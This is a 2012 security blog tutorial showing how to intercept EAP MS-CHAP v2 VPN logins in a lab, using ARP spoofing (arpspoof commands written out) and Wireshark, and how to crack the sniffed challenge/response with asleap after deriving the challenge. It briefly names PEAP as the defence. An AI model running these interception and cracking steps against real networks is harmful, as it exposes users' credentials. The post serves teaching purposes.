Tuesday, September 11, 2012

Attacking MS-CHAP v2

MS-CHAP v2 is an authentication protocol widely used in VPN implementations.
It uses a challenge-response mechanism in combination with the NT hash of the password to transfer the credentials.

Unlike the older CHAP authentication, where the server requires the plain text of the password, MS-CHAP v2 only requires the NT hash of the password to validate the challenge-response.
It can also be used as an EAP protocol, EAP MS-CHAP v2, in combination with a RADIUS server. When deployed with a RADIUS server, then the RADIUS server is responsible for generating the challenge and for validating the response.

So we are pretty safe here? There is no way to recover the password?

Well, maybe there is. We will demonstrate...

In our setup we use a RADIUS server with EAP MS-CHAP v2 as the authentication protocol.

VPN server: 10.0.1.1
VPN client: 10.0.1.100




We'll describe (briefly) the flow:

The client connects to the VPN server, the RADIUS client. The server sends a RADIUS Access-Request to the RADIUS server. RADIUS messages are transferred between RADIUS client and RADIUS server. The RADIUS server generates a challenge and sends this challenge, through the RADIUS client, to the VPN client. The VPN client sends the response. RADIUS server validates the response and sends a RADIUS Access-Accept message to the VPN server. Our VPN server grants the client access.

The challenge-response is send in clear text. The root of all evil starts here :)
We will try to capture it with our sniffer. To capture the traffic between client and server we will do a MiTM attack (unless you have a hub).



We start an ARP injection attack with the tool arpspoof.

Syntax:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.0.1.1 10.0.1.100
arpspoof -i eth1 -t 10.0.1.100 10.0.1.1


Now all traffic is send to the attacker. We can start wireshark to sniff the traffic.
After filtering the messages we find both the challenge and the response!

filter: ip.src==10.0.1.100 or ip.dst==10.0.1.100 and eap




We copy both values as a HEX stream.

Our challenge:

93389f82ae615e7d488953d2f6d4cee6

Our response:

2a75d21673b1bdf2122719b093e4d27c000000000000000041dcd2b40b06ed540208e86027dd2b3643583fd6ee8dd89a00

Now we can use a tool called asleap to recover the password from our sniffed challenge and response. Asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and MS-CHAP passwords.
It uses a dictionary attack to recover the password. It generates a MD4 hash from a plaintext password, included in the dictionary file, resulting in the NT hash. Then it encrypts the challenge 3 times with the NT hash of the password using the DES algorithm. If the result is the same as our sniffed response then we know that the password is cracked!
Unfortunately, we will not succeed in cracking the password using the above challenge and response together with a custom dictionary file.

After a little search I found that MS-CHAP v2 is also using a client challenge and the username to generate the response. So using only our server challenge in combination with the NT hash and the DES algorithm can never result in our response!

A MS-CHAP client uses SHA1 to hash the client challenge, the server challenge and the username. The first 8 bytes are a new random challenge. This new challenge encrypted with the NT hash and DES algorithm results in our response.
If we can figure out this new challenge, we can recover the password using asleap!

I found some interesting articles how MS-CHAP v2 creates this challenge. Based on this information I made a little python script that calculates the new challenge and starts automatically asleap using our custom dictionary file. I called the tool chappie.py :)

We only need to enter our known parameters:



Once entered, we can recover the password. Our password was pretty obvious.



The following python code calculates our new challenge. We convert the original server challenge and the client challenge to a binary value. Together with the username we generate a SHA hash and take the first 8 bytes (or 16 characters hexadecimal).



Oops... and you thought that MS-CHAP v2 with a RADIUS server was safe?
How to defend against such attacks? Well, you should definitely attend our IT Security BOOTCAMP courses. We will teach you that a server certificate and the PEAP protocol solves the problem...

Thanks for reading this article!
Do not hesitate to contact me if you have any questions or if you need more information.
You can also follow us on Twitter  -  http://twitter.com/MME_IT